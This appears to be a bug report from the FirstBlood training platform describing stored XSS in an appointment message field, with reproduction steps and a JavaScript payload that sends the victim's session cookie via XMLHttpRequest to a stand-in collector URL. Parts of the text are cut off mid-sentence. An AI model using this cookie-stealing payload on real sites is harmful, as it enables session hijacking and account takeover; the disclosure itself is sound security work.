FirstBlood-#811 — Stored XSS on /manageappointment.php can lead to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-28, 0xblackbird reported:
Hello! I found out that the message of any appointment gets reflected inside the
Steps to reproduce:
- First of all, we need to book an appointment. To do so, we need to navigate to
/book-appointment.phpand fill in all the required fields. Enter the following as the message/extra comment and click on Book Appointment:
- Copy the your appointment ID and head over to
/yourappointments.php, paste your ID in the Appointment ID field and finally, click on Retrieve Appointment.
- Once the page loaded, you'll should see a confirm box popup with the domain name
';%0alet url='http://localhost/?cookie=';var y=new XMLHttpRequest();y.open('GET',url%2BencodeURIComponent(document.cookie),true);y.send();//.
Just enter the above payload in the message field and modify your appointment. This will reload your page and you'll need to enter the appointment ID again to retrieve your appointment (or you can just go back and refresh the page).
- After the page has loaded, and the request has been made, you should see a request coming in with the session cookie.
FirstBlood ID: 22
Vulnerability Type: Stored XSS